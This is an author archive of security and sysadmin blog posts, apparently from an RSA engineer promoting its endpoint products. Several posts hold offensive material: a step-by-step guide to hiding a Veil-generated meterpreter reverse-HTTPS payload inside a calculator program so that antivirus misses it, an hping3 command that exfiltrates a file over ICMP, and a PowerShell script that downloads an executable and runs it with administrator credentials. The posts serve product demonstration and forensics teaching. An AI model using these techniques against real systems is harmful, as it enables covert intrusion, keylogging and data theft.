Auteursarchief: sdrinkenburg

Bypassing Cisco’s Sourcefire AMP endpoint solution – Full demo & comparison with RSA NWE

This article will demonstrate one of the key differences between NG AV endpoint protection and EDR solutions such as RSA NetWitness for Endpoints. In this article, we will demonstrate how Cisco’s endpoint protection solutions Sourcefire AMP is easily bypassed by performing a buffer overflow and in-memory post exploitation activities. This test was performed on a fully patched Windows 10 machine with an active MS Defender, MS Firewall, Cisco AMP & RSA NWE agent installed.

The setup used for this test was the following:


Windows 10 client protection verification


Vulnerable application is installed and running


Cisco SourceFire AMP does not find any issues on the clean machine


AMP tracking information does not highlight any suspicious activities


RSA NWE does not find any suspicious activities on the clean machine


Attacker – KALI setting up exploit & payload module



Running remote buffer overflow exploit


No alerting from either Cisco AMP or MS Defender…


Attacker runs additional post exploitation activities such as a keylogger


Attacker searches and downloads password.txt & creates a screenshot


Attacker performs a ARP network scan


Attacker start an interactive SHELL and runs WHOAMI & IPCONFIG commands


Still no alerting from either Cisco AMP or MS Defender…


Cisco AMP does not detect or notifies on exploit and post exploit activities….



Now let’s look at RSA NWE



What would you prefer?……. :-S




RSA NetWitness. Disable AD accounts and add Domains to a Proxy block list with a mouse click. Examples and code

This article is aimed to demonstrate the flexibility of the RSA Netwitness solution by showcasing some simple mouse click response activities. The first example demonstrates the disablement of Active Directory Domain User Accounts using just one mouse click. The second example use a similar approach to add domains to a proxy blacklist.  All necessary commands, settings and code are provided at the bottom of the article. I hope you will find this useful and if you have any comments or suggestions please let me know.

Example 1. Mouse Click Active Directory User Account Disablement

Brief infra overview:

  • – NW Server & Packet Hybrid
  • – NW ESA & Log decoder
  • – Windows 2012 DC with domain RSA.LAB
  • – Centos Apache, PHP & Squid Proxy installation

Screenshot overview:







Example 2. Mouse Click Proxy Blacklist Domain Activity

Brief infra overview:

  • – NW Server & Packet Hybrid (RSA internal demo VM)
  • – NW ESA & Log decoder (RSA internal demo VM)
  • – Windows 2012 DC with domain RSA.LAB
  • – Centos Apache, PHP & Squid Proxy installation

Screenshot overview:






If you like replicate this setup please leave a comment or send me a message and I will send you all required setup & config files.


Data exfiltration over ICMP

hping3 using kali linux

-E filename to send
-1 use ICMP
-u tell you when –file reached EOF and prevent rewind
-i send ICMP every 10 seconds (slow)
-d Destination IP

root@kali:~# hping3 -E dns2tcp.txt -1 -u -i 10 -d 95
HPING (eth0 icmp mode set, 28 headers + 95 data bytes
[main] memlockall(): Success
Warning: can’t disable memory paging!
len=123 ip= ttl=128 id=27778 icmp_seq=0 rtt=3.2 ms
len=123 ip= ttl=128 id=27806 icmp_seq=1 rtt=3.1 ms
len=123 ip= ttl=128 id=27852 icmp_seq=2 rtt=2.9 ms
EOF reached, wait some second than press ctrl+c
len=123 ip= ttl=128 id=27877 icmp_seq=3 rtt=2.6 ms

Data in file send “dns2tcp.txt”

root@kali:~# cat dns2tcp.txt

cat dns2tcpdrc

listen =
port = 53
user = nobody
chroot = /tmp/
domain =
resources = ssh:
dns2tcpd -F -d 3 -f /dns2tcpdrc


Monitor on receiving end using Wireshark


icmp display filter


First session contains first part of the original file


Second session the rest of the file etc.

Network Forensics Tools & Commands

Sort & Uniq

| sort | uniq -c | sort -nr


tshark -r file -Y  <display filter> -T fields -e <fieldname>

tshark -r /cases/*.pcap -Y ftp -T fields -e ip.src -e ip.dst | sort | uniq -c | sort –nr

  • Identify search strings

tshark -n -r /cases/*.pcap -Y ‘ contains “google” and http.request’

  • Determine POST to domain

tshark -n -r /cases/*.pcap -Y ‘ contains “dropbox.xom” and http.request.method == “POST”‘

  • Observe content in frame number

tshark -n -x -r /cases/*.pcap -Y ‘frame.number==27757’

  • Identify TCP stream number

tshark -n -x -r /cases/*.pcap -Y ‘frame.number==27757’ -T fields -e

  • Extract base64 data from stream

tshark -n -r /cases/*.pcap -Y ‘’ -T fields -e tcp.segment_data > /cases/extract.txt

  • Analyse web url requests

tshark -n -r /cases/*.pcap -T fields -E separator=/t -e frame.number -e frame.time -e http.referer -e http.cookie -Y ‘http.request.uri contains “dropbox”‘


md5sum cases.pcapl


sudo tcpdump -n -i eth0 -s 0 “arp”

sudo tcpdump -n -i eth0 -s 0 “arp and not ether dst ff:ff:ff:ff:ff:ff”

sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap

sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap “net”


  • List pcap filename/md5/start/end – capture times

capinfos -T -H -a -e *.pcap /cases/*


editcap -A ‘2015-11-15 00:00:00’ -B ‘2015-11-16 00:00:00:00’ /cases/*.pcap ~/smaller.pcap


  • Encode to Base64

cat file | base64 > file.txt

  • URL Base64 decode

Obtain base64 code from follow stream in wireshark and save to file

cat base64-from-url.txt | > native-base64.txt

decode base64 data in a new file

base64 -di native-base64.txt > decode-base64.bin

  • check intended file type

file decode-base64.bin

unzip -t decode-base64.bin

certutil -decode file.txt test.exe


sudo arp-scan -l

Wireshark filters

arp and not eth.dst == ff:ff:ff:ff:ff:ff

http.request and contains “google”

http.request.method == “post” and contains “”


  • Order by amount of bytes, Aggregate on proto type

nfdump -O bytes -o extended -R cases/ ‘ip’ -A proto

  • Show only session with SYN flag, order by packets, aggregate scr & dst ip’s

nfdump -O packets -R cases/ -A srcip,dstip ‘proto tcp and src ip and flags S and not flags AFRPU’

  • Example with custom format and filer

nfdump -O packets -A dstip -t ‘2015/07/15-2015/08/15’ -R cases/ -o ‘fmt:%da %pkt %fl %bpp’ ‘proto tcp and src ip and flags S and not flags AFRPU and (dst ip or dst ip or dst ip’

  • Output formats

-o long, extended

-o “fmt:%sa %da”

Tag Description Tag Description
%ts Start Time – first seen %in Input Interface num
%te End Time – last seen %out Output Interface num
%td Duration %pkt Packets
%pr Protocol %byt Bytes
%sa Source Address %fl Flows
%da Destination Address %pkt Packets
%sap Source Address:Port %flg TCP Flags
%dap Destination Address:Port%tos %tos Tos
%sp Source Port %bps bps – bits per second
%dp Destination Port %pps pps – packets per second
%sas Source AS %bpp bps – Bytes per package
%das Destination AS    

-B flow direction based on port number >1024 client <1024 server

nfdump -B -O tstart -o extended -R 2013/ -o ‘fmt:%ts %te %sa %da %d’ ‘proto tcp and src ip and flags S and not flags AFRPU’





–enable referrer

SMB protocol Wirieshark filters

SMB sessions active untill:

-The network connection times out

-The users closes the session

-The user de-authenticates

-The connection fails a server-side security check

Protocal Negotiation  “smb.cmd == 0x72”

LANMAN/ NTLM negotiation

Session Establishment   “smb.cmd == 0x73”

The spnego.negResult field indicates if authentication was successfull result = 0x00

Process ID # gives indication if authentication is initiated by a core system <1000 or user level process >1000

All sessions are uniquely identified by the Multiplex ID so client and server can pair reponse packets

When authentication is successful a USER ID is added which is only valid during the same SMB session

Accessing Service “smb.cmd == 0x75”

Request access to resource

Server checks, if successfull a Tree ID is added

Network Directory  “smb.cmd == 0x32 && smb.trans2.cmd == 0x0005 && smb.qpi_loi == 1004”

Opening a file “smb.cmd == 0xa2”

If a client is permitted access to a file, the server returns a FID ID. This value should not be used to track file access instead use:

smb.cmd == 0xa2 and !smb.fid and smb.file

Create and Request        “smb.cmd == 0xa2” and !smb.fid and smb.file

Locking file for access     “smb.cmd == 0x24”

Reading from file             “smb.cmd == 0x2e”

Closing a file                       “smb.cmd == 0x04”

Tree Disconnect               “smb.cmd == 0x71”

Uses corresponding Tree ID

Logoff                                   “smb.cmd == 0x74”

Uses corresponding UID & PID

Process ID == 996 == 0x03e4
User ID smb.uid    
Tree ID smb.tid    
File ID smb.fid    
  • Export objects from SMB in Wireshark

Wireshark -> File -> Export Objects -> SMB/SMB2

Collecting log evidence

Firewall files





IDS files










-d                            destination ip

-i                             input interface

-o                            output interface

-p                            layer 4 proto

–dport                                 destination port

–syn                      match packets with only SYN flags

-j LOG                   Log matched traffic

-j REJECT              Reject matched traffic

SSL Traffic

  • Profile client encryption ciphers

tshark –n –r /cases/*pcap –Y ‘ssl.handshake.type == 1’ –T fields –e ip.src –e ssl.record.version –e ssl.handshake.ciphersuite > /cases/ssl_ciphersuites_by_ip.txt

cat /cases/ssl_ciphersuites_by_ip.txt | awk ‘{print $3}’ | sort | uniq –c | sort –nr

  • Identify SSL certificate subject

tshark –n –r /cases/*pcap –Y ‘ssl.handshake.certificate’ –T fields –E separator=\ | -E aggregator=\ | -e x509ce.dNSName –e x509sat.teletexString –e x509sat.uTF8String –e x509sat.universalString –e x509sat.IA5String | tr –s \ | ‘\n’ | sort | uniq –c | sort –nr


  • Search PCAP for strings

ngrep -I dump6.pcap -w ‘root’ -N -t –q

  • Search PCAP for hex value

ngrep -I dump6.pcap  -xX ‘0xc5d5e5f55666768696a6b6c6d6e6’ -N -t –q


  • Extract files (auto file carving) from pcap

tcpxtract -f dump3.pcap

PowerShell Download File with Authentication

Download files from a external site using authentication in PowerShell

$Url = “;
$Path = “$env:temp\test.txt”
$Username = “”
$Password = “”

$WebClient = New-Object System.Net.WebClient
$WebClient.Credentials = New-Object System.Net.Networkcredential($Username, $Password)
$WebClient.DownloadFile( $url, $path )
notepad $Path

PowerShell Download & run-as script

PowerShell Download & run-as script

PowerShell script


#Predefine necessary information
$Username = “DOMAIN\Administrator”
$Password = “PASSWORD”

#Create credential object
$SecurePassWord = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object -TypeName “System.Management.Automation.PSCredential” -ArgumentList $Username, $SecurePassWord

#Download file from website

$Url = “;
$Path = “$env:temp\example.exe”

$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile( $url, $path )

(New-Object System.Net.WebClient).DownloadFile($url, $output)
#Start shell
Start-Process $Path -Credential $Cred



Save as run-as-admin.ps1

If needed compile your .ps1 file to .exe with PS2EXE

Pyinstaller – fixing – Dropbox python API SSL issue

When playing around with the python dropbox API to upload files, I ran into issues when trying to make a single executable using pyinstaller.

The error I received was similar as shown below:


I figured it had to do with the trusted-certs  file used by the dropbox API to validate its SSL connection to the dropbox servers.

To overcome this issue, I had to perform the below steps:

  1. First browse to your dropbox API folder and copy the trusted-certs.crt to another location

    In my case this was C:\Python27\Lib\site\packages\dropbox\

Copy trusted-certs.crt to d:\

   2. Stay in the dropbox api folder and open the file using your favorite editor program.

 3. Within file look for the section that starts with:

TRUSTED_CERT_FILE = pkg_resources.resource_filename(__name__, ‘trusted-certs.crt’)

change this to:

def resource_path(relative_path):

“”” Get absolute path to resource, works for dev and for PyInstaller “””


# PyInstaller creates a temp folder and stores path in _MEIPASS

base_path = sys._MEIPASS

except Exception:

base_path = os.path.abspath(“.”)

return os.path.join(base_path, relative_path)

TRUSTED_CERT_FILE = (resource_path(‘certs\\trusted-certs.crt’))

This will ensure that the dropbox API will look in the %temp% directory which the standalone .exe creates at runtime.

  4. Now you have to recompile rest.pyc so the dropbox API and pyinstaller use the changes made

Open python in CMD and run the following command (change the file path to fit your setup)

>>> import py_compile


5. The final step is to create a pyinstaller .spec file in which you tell pyinstaller to copy and include the                        trusted-certs.crt file in the %temp% directory where it also writes files needed by the program at run time.

Do the following:

Run pyinstaller using the “” file which you like to convert into a single exe file

In my case this is:


This will create a find-copy.spec file within the running directory (d:\). Copy and rename this file to something else like           myprog.spec.

Open myprog.spec and modify the following. Make sure the trusted-cert.crt path reflects your situation!

a = Analysis([‘’],



             datas=[(‘d:/trusted-certs.crt’, ‘certs’)],








  6. You are no ready to re-run pyinstaller but this time specifying the myprog.spec file

In my case this looks like this:

Pyinstaller –F myprog.spec

  7. If all went well you should now have a working .exe file which copies and finds the required trusted-certs.crt         file needed by the dropbox API

Enjoy 😉

Linux (Centos) failover without a third-party load balance solution

In this article I describe the steps I followed in order to test a redundant Centos server setup. My goal was to create an Active/Passive Centos setup that could work without the use of any third-party load balance solutions.


Configuration steps (for each Centos LB server)

Enable yum repositories on server

# vi /etc/yum.repos.d/CentOSBase.repo

set enable to 1

Install Keepalived on both servers

# yum install keepalived

Configure keepalived config file

# vi /etc/keepalived/keepalived.conf

Set config similar to below and change state, interface, priority & virtual ip address accordantly:

[root@VLC-2 ~]# vi /etc/keepalived/keepalived.conf




notification_email_from Alexandre.Cassen@firewall.loc


smtp_connect_timeout 30

router_id LVS_DEVEL


vrrp_instance VI_1 {

state MASTER

interface eth0

virtual_router_id 51

priority 101

advert_int 1

authentication {

auth_type PASS

auth_pass 1111


virtual_ipaddress {



Start keepalived services

# service keepalived start

Check for newly created VIP address

[root@CEN-2 ~]# ip address show eth0

2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000

link/ether 00:0c:29:d1:08:f1 brd ff:ff:ff:ff:ff:ff

inet brd scope global eth0

inet scope global eth0

inet6 fe80::20c:29ff:fed1:8f1/64 scope link

valid_lft forever preferred_lft forever

[root@CEN-2 ~]#


Make Keepalived start at boot time

# chkconfig keepalived on


Configuration steps (on Master only!)

Create a process monitoring script so eth0 is disabled when “your-process” stops running

Mkdir /scripts

# vi /scripts/

Create a similar script as shown below:


# your-process process monitoring script shutdown interface eth0

while :


CURRENT=$(status your-process | awk ‘{ print $2}’ | sed ‘s/,//g’)


if [ “$CURRENT” = “$THRESHOLD” ] ; then

logger -t your-process not compliant

ifconfig eth0 down



logger -t your-process compliant

sleep 15



Test the script is running by checking the /var/log/messages entries. This should look similar to this:

# tailf /var/log/messages

Oct 18 20:50:06 VLC1 puppet-agent[1666]: Finished catalog run in 22.05 seconds

Oct 18 20:50:07 VLC1 your-process: compliant

Oct 18 20:50:22 VLC1 your-process: compliant

Make start at boot time and run it as a background process so it will not intervene with the normal boot process of the VLC server

# vi /etc/init.d/



#Call your-process script and run in background

exec /scripts/ &



Change to obtain execution rights

# chmod +x

Make it run after the boot sequence

# echo /etc/init.d/ >> /etc/rc.local

Reboot the CentOS and check the process has started

# ps ax | grep your-process

1637 ?        S      0:00 /bin/bash /scripts/

4663 pts/0    S+     0:00 grep your-process


Although Keepalive and the process monitoring script are not ideal. They can be useful when you like to test or need to demonstrate a redundant setup with no access to third party solutions.

Your comments or thoughts are more than welcome!

An easy way of creating your own Trojan

An easy way of creating your own Trojan

In this article I will describe how you can easily create your own Trojan for demos or other fun purposes. The tools used in this article are the following:

  1. The Veil-Evasion Framework & Kali server;
  2. C or C# source code of a program of choice;
  3. Visual Studio or any other development solution;
  4. Windows 8.1 with AV client machine & RSA ECAT agent.

The steps we will follow are listed below and are worked out in more detail in separate paragraphs:

  1. Create a payload in C# code with the Veil-Evasion Framework;
  2. Copy the created payload to your machine that has for example Visual Studio installed;
  3. Include the payload and re-assemble the C# source code program;
  4. Test your newly created Trojan.

Step 1 & 2 Veil-Evasion Framework

The Veil-Evasion Framework is a very nice solution which allows pen testers to create payloads & executables within a few clicks.

In this example we will be using the framework to create an encrypted reverse https metasploit payload in C# code.

  1. Install Veil-Evasion on your Kali Linux distribution
  2. Start Veil-Evasion


  1. Select Payload cs/meterpreter /rev_https


  1. Set LHOST & LPORT to fit your own environment, make sure to enable the Arya crypter & issue the generate command to create the payload


  1. Provide your preferred file name


  1. Veil has now created an encrypted payload in C# code which we will use is step three of this process.
  2. Copy the created file (calculator-payload.cs) file to your machine running Visual Studio

Step 3 include payload & re-assemble program of choice

In this example we will add the created payload to the C# source code of a calculator program. The source code used will be made available for download.

  1. Open the calculator-payload.cs with notepad++ or any other file editor


Notice the System requirements (System.Collections.Generic, System.Text, System.IO etc.) and the class & static void parts of the program.

  1. Open the source code of your choice or use the attached calculator source code


Once Visual Studio opens it should look similar as shown below:


Now we need to make sure the program includes all required system namespaces. For this we need to add all system namespaces that are not included in the original source code. In this case this will look as shown below:


Notice that System.Text, System.IO & System.Reflection are added


Now we need to add our code in both the Static class and Static void parts of the original program:

This can be done by coping and pasting the code from the notepad session as shown in step 1.

Once you are done the result should look similar as shown below:


When you copy the code in after the Application.Run part, the program will run normally and start Form1() as expected. Once this form is closed, the program will execute the payload before shutting down.

  1. Assemble your new Calculator application

Before we assemble the modified source code you can change the assembly name or Icon to whatever you like. In this case I will make sure the program gets assembled with the name Calculator-Demo.exe and will use the Windows Calculator symbol as an Icon.


Once done, click on Build Solution or F7 in Visual Studio and make sure the outcome does not state any errors:


Your newly created Trojan is now ready to be tested.

Step 4. Test your newly created Trojan

To test your Trojan we will need to do the following:

  1. Copy the Calculator-Demo.exe to a victim machine
  2. Start a metasploit https reverse handler on the attackers machine
  3. Execute the calculator
  4. Check for a successful metapreter connection

Step 1. Copy the Calculator-Demo.exe

In this example I will copy the Calcultor.Demo.exe to a fully patched Windows 8.1 system which is running a TrendMicro antivirus & RSA ECAT agent.


When I scan the copied file with AV no issues are detected:


Step 2. Start a metasploit https reverse handler on the attackers machine

The attacker will be the same machine which we used to create the payload with. When creating the payload Veil-Evasion also created a handler file which we can use to easily startup the https listener

First we need to browse the the veil-output/handlers directory.


After this we can start the metasploit console with a –r command so that the configuration variables within the handler file are loaded.

This will startup a metasploit handler and should look similar as shown below:


Step 3. Execute the calculator

Now we need to go back to the victim’s machine and execute the calculator


As you can see the calculator starts as expected. To execute the payload the program needs to be closed. When doing this AV still does not detect anything..

Step 4. Check for a successful meterpreter  connection  

When we go back to our attacker machine we should see a successful meterpreter session


Let’s interact with this session and start a keylogger


When we check the victims machine type something and dump the keystrokes on the attackers machine, AV still does not notice anything..



When we check the RSA ECAT server however all activities are detected.

  1. Execution and migration of Calculator-Demo.exe to notepad.exe


Network connection & IOC to attacker’s machine:


Use of floating code (keylogger) in memory



Building a Trojan does not have to be difficult, AV is dead and RSA ECAT rules 😉

How to resolve DNS queries using different DNS servers & without DNS forwarding

If you ever run in the issue were you have two different DNS servers that are both responsible to resolve different records and you are not allowed to configure DNS forwarding. You can use the following procedure on your Linux, Unix based distro:


  1. cd /usr/bin
  2. cp nslookup nslookup.orig
  3. rm nslookup
  4. vi nslookup

if [[ $HOSTNAME = 192.168.2* ]]; then

/usr/bin/nslookup.orig $HOSTNAME

elif [[ $HOSTNAME = *rsa.lab ]]; then

/usr/bin/nslookup.orig $HOSTNAME


/usr/bin/nslookup.orig $HOSTNAME


  1. chmod 777 nslookup

As a result, internal IP addresses staring with 192.168.2.* and hostnames containing *.rsa.lab where resolved by the DNS server with IP whilst everything else got resolved by the DNS server with IP